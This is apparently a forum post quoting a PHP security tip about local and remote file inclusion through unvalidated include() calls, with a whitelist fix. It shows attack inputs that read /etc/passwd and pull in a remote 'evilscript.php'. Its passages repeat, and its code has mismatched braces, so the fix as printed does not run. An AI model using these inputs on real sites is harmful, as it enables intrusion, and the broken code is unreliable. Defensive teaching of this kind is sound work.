If your page is using Include() and/or Require() functions, make sure you are doing an error check to pull only the files you want.
QUOTE(devshed)
1. Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first.
Take the following example:
Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON):
script.php?page=/etc/passwd
Therefore causing your script to include the servers /etc/passwd file. When a non PHP file is include()'d or require()'d, it's displayed as HTML/Text, not parsed as PHP code.
On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:
script.php?page=http://mysite.com/evilscript.php
He would be able to have evilscript.php output any PHP code that he or she wanted your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser.
Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed.
Take the following example:
CODE
if(isset($page))
{
include($page);
}
{
include($page);
}
Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON):
script.php?page=/etc/passwd
Therefore causing your script to include the servers /etc/passwd file. When a non PHP file is include()'d or require()'d, it's displayed as HTML/Text, not parsed as PHP code.
On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:
script.php?page=http://mysite.com/evilscript.php
He would be able to have evilscript.php output any PHP code that he or she wanted your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser.
Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed.
CODE
$pages = array('index.html', 'page2.html', 'page3.html');
if( in_array($page, $pages) )
{
include($page);
{
else
{
die("Nice Try.");
}
if( in_array($page, $pages) )
{
include($page);
{
else
{
die("Nice Try.");
}
More good PHP security tips can be found here http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/
I have been fixing hacked websites the last couple days because the scripts did not have a good error check.
